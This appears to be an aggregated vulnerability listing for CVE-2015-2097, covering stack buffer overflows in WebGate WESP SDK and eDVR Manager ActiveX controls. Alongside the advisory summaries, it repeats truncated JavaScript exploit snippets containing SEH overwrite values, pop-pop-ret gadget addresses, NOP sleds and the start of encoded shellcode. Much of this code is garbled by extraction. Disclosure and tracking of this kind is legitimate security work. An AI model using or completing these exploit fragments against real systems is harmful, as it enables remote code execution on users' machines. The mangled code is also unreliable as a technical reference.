WebGate Multiple Products WESPSerialPortCtrl Buffer Overflow (CVE-2015-2097)

A buffer overflow vulnerability exists in WebGate Multiple Products. The vulnerability is due to insufficient input validation of the length of the parameters passed to the Connect method of WESPSerialPort.WESPSerialPortCtrl.1. A remote attacker could exploit this vulnerability by enticing a user...

WebGate Multiple Products WESPMonitor Stack Buffer Overflow (CVE-2015-2097)

A stack buffer overflow vulnerability exists in multiple products of WebGate. The vulnerability is due to insufficient boundary checks when processing parameters of methods LoadImage and LoadImageEx of the WESPMONITORLib.WESPMonitorCtrl ActiveX control. A remote attacker could exploit this...

WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow

WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh =...

WebGate WESP SDK 1.2 - ChangePassword Stack Overflow

WebGate WESP SDK 1.2 - ChangePassword Stack Overflow var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i248; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; //WESPConfig.dll0x10022f35 = pop pop pop ret var seh = "\x3d\x2f\x02\x10"; for i=0;i80; i++ nops +...

Webgate WESP SDK 1.2 ChangePassword Stack Overflow Exploit

Exploit for windows platform in category remote exploits var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i248; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; //WESPConfig.dll0x10022f35 = pop pop pop ret var seh = "\x3d\x2f\x02\x10"; for i=0;i80; i++ no...

WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow Exploit

Exploit for windows platform in category remote exploits var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh =...

CVE-2015-2097

creationtimestamp| type| source ---|---|--- 2015-04-02 00:00:00+00:00| confirmed| https://www.exploit-db.com/exploits/36607...

WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow

var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh = "\xe7\x04\x01\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...

WebGate eDVR Manager Stack Buffer Overflow

var arg1 = ""; nops = ""; var buff = ""; fori=0;i"+"Lengths: arg1="+arg1.length+" seh="+seh.length+""; fori=0;i200;i++ nops += "\x90"; sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +...

WebGate eDVR Manager Stack Buffer Overflow Exploit

Exploit for windows platform in category remote exploits var arg1 = ""; nops = ""; var buff = ""; fori=0;i"+"Lengths: arg1="+arg1.length+" seh="+seh.length+""; fori=0;i200;i++ nops += "\x90"; sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +...

CVE-2015-2097

Multiple buffer overflows in WebGate Embedded Standard Protocol WESP SDK allow remote attackers to execute arbitrary code via unspecified vectors to the 1 LoadImage or 2 LoadImageEx function in the WESPMonitor.WESPMonitorCtrl.1 control, 3 ChangePassword function in the WESPCONFIGLib.UserItem...

CVE-2015-2097

CVE-2015-2097 describes multiple buffer overflow vulnerabilities in WebGate WebGate eDVR Manager components using the WebGate Embedded Standard Protocol (WESP) SDK. The advisories identify insufficient input validation/boundary checks in several controls (notably WESPMonitorCtrl LoadImage/LoadIma...